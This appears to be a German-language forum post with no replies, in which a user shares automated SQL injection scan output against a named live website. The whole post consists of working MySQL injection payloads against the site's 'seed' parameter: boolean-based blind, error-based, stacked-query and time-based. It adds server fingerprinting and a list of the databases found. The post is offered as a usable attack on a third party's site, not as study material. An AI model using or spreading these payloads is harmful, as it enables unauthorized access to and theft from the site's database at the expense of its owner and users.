Keine Antworten in diesem Thema

[Ch!ller]

http://ms.girls24.de/modelle.html?seed=9988&seite=7

Parameter: seed (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: seed=9988) RLIKE (SELECT (CASE WHEN (2088=2088) THEN 9988 ELSE 0x28 END)) AND (2389=2389&seite=7

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: seed=9988) AND (SELECT 2177 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (CASE WHEN (2177=2177) THEN 1 ELSE 0 END)),0x7171766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8050=8050&seite=7

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: seed=9988); SELECT SLEEP(5)-- &seite=7

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: seed=9988) AND SLEEP(5) AND (1694=1694&seite=7
---
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db318902_4
[*] information_schema